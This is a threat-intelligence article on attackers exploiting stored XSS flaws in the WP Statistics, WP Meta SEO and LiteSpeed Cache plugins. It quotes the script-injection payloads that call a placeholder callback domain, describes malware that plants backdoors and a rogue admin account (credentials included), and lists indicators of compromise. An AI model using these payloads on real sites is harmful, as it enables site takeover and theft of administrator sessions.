Hackers Exploiting Stored XSS Vulnerabilities in WordPress Plugins

In recent cyberattacks, hackers are actively exploiting stored cross-site scripting (XSS) vulnerabilities in various WordPress plugins.

According to Fastly reports, these vulnerabilities, identified as CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000, are targeted due to inadequate input sanitization and output escaping, allowing attackers to inject malicious scripts.

Vulnerability Details

CVE-2024-2194

The WP Statistics plugin (version 14.5 and earlier) is vulnerable to stored cross-site scripting via the URL search parameter.

- Advertisement -

utm_id="><script src="https://{CALLBACK_DOMAIN}/"></script>

This vulnerability allows unauthenticated attackers to inject arbitrary web scripts via the URL search parameter.

All-in-One Cybersecurity Platform for MSPs to provide full breach protection with a single tool, Watch a Full Demo

These scripts are executed whenever a user accesses an injected page.

The attacker repeatedly sends requests containing this payload to ensure it appears on the most visited pages, adding the “utm_id” parameter to these requests.

• Disclosure Date: March 11, 2024
• Discovered By: Tim Coen
• Active Installations: Over 600,000
• Affected Versions: Versions lower than 14.5 remain active on about 48% of all websites using the plugin.

CVE-2023-6961

The WP Meta SEO plugin (version 4.5.12 and earlier) is susceptible to stored cross-site scripting attacks via the Referer HTTP header.

Referer: <script src="https://{CALLBACK_DOMAIN}/"></script>

The attacker sends this payload to a target site, particularly to a page that generates a 404 response.

The WP Meta SEO plugin inserts this unsanitized header into the database to track redirects.

When an administrator loads the 404 & Redirects page, the script pulls obfuscated JavaScript from the callback domain and executes it in the victim’s browser.

• Disclosure Date: April 16, 2024
• Discovered By: Krzysztof Zając from CERT PL
• Active Installations: Over 20,000
• Affected Versions: Versions lower than 4.5 remain active on about 27% of all websites using the plugin.

CVE-2023-40000

WordPress’s LiteSpeed Cache plugin (version 5.7.0.1 and earlier) is vulnerable to stored cross-site scripting through the ‘nameservers’ and ‘_msg’ parameters.

result[_msg]=<script src="https://{CALLBACK_DOMAIN}/"></script>

The XSS vulnerability is triggered when an admin accesses any backend page because the XSS payload is disguised as an admin notification, causing the malicious script to execute using their credentials for subsequent malicious actions.

• Disclosure Date: February 2024
• Discovered By: Patchstack
• Active Installations: Over 5 million
• Affected Versions: Versions lower than 5.7 remain active on 15.7% of all websites using the plugin.

JavaScript Malware

The contents of the malicious JavaScript perform the following actions:

• Injects Malicious PHP Backdoors:

• Into plugin files
• Into theme files

• Creates a New Administrator Account:

• Sends a request to the server’s WordPress installation to create a new administrator account

• Initiates Tracking:

• Implements tracking via Yandex, either through JavaScript or a tracking pixel

The malicious PHP performs the following:

• Injects Tracking Script:

• Searches recursively for wp-loads.php and injects the following into wp-config.php:

<script src="https://{TRACKING_DOMAIN}/"></script>

• Creates a new WordPress admin user:

• Username: admin
• Password: 7F9SzCnS6g3AFLAO39Ro
• Email: admim@mystiqueapi[.]com

• Tracks Infected Hosts:

• Sends a GET request to:

hxxp://ur.mystiqueapi[.]com/?ur=<$_SERVER['HTTP_HOST']>

Threat Actor Activity

CVE-2024-2194

The domain media.cdnstaticjs[.]com is linked to the exploitation of CVE-2024-2194.

We have observed attacks from 17 different IP addresses targeting this vulnerability, primarily originating from AS202425 (IP Volume Inc.) and AS210848 (Telkom Internet LTD), with a concentration of attacks coming from the Netherlands.

CVE-2023-6961

The domain idc.cloudiync[.]com is linked to the exploitation of CVE-2023-6961.

To date, over 5 billion requests have attempted to exploit this vulnerability from a single IP address, which originates from the autonomous system AS202425 (IP Volume Inc.).

Additionally, since May 16th, we have observed media.cdnstaticjs[.]com being used in attack payloads targeting this vulnerability. This domain is also used in attacks targeting CVE-2024-2194.

CVE-2023-40000

The domains cloud.cdndynamic[.]com, go.kcloudinc[.]com, and cdn.mediajsdelivery[.]com are associated with the exploitation of CVE-2023-40000.

The last observed attack using the domain cdn.mediajsdelivery[.]com was on April 15th. Since then, we have only seen cloud.cdndynamic[.]com and go.kcloudinc[.]com being used in attacks targeting this vulnerability.

Unlike the previous two vulnerabilities, the attacks exploiting CVE-2023-40000 are more distributed across different IP addresses and autonomous systems (AS).

We have observed attacks from 1664 distinct IP addresses, primarily originating from AS210848 (Telkom Internet LTD) and AS202425 (IP Volume Inc.).

A significant concentration of attacks came from the Netherlands.

The domain assets.scontentflow[.]com was registered shortly after CVE-2023-6961 was publicly released, and this is the primary domain being written into infected sites in payloads coming from idc.cloudiync[.]com.

Web pages containing this payload are minimal according to our searches, indicating limited infection success thus far with this payload.

The domain cache.cloudswiftcdn[.]com was registered before all three CVEs being publicly released.

The payloads observed referencing this domain are structured similarly to other observed payloads but add over 40 additional themes to attempt to backdoor.

There are over 3000 pages containing this script, according to searches on PublicWWW.

This, combined with the earlier registration time, might indicate a longer period of use or infection time.

Indicators of Compromise (IOCs)

Domains

media.cdnstaticjs[.]com
cloud.cdndynamic[.]com
idc.cloudiync[.]com
cdn.mediajsdelivery[.]com
go.kcloudinc[.]com
assets.scontentflow[.]com
cache.cloudswiftcdn[.]com

IP Addresses 

80.82.76[.]214
31.43.191[.]220
94.102.51[.]144
94.102.51[.]95
91.223.82[.]150
185.7.33[.]129
101.99.75[.]178
94.242.61[.]217
80.82.78[.]133
111.90.150[.]154
103.155.93[.]120
185.100.87[.]144
185.162.130[.]23
101.99.75[.]215
111.90.150[.]123
103.155.93[.]244
185.209.162[.]247
179.43.172[.]148
185.159.82[.]103
185.247.226[.]37
185.165.169[.]62

Get special offers from ANY.RUN Sandbox. Until May 31, get 6 months of free service or extra licenses. Sign up for free.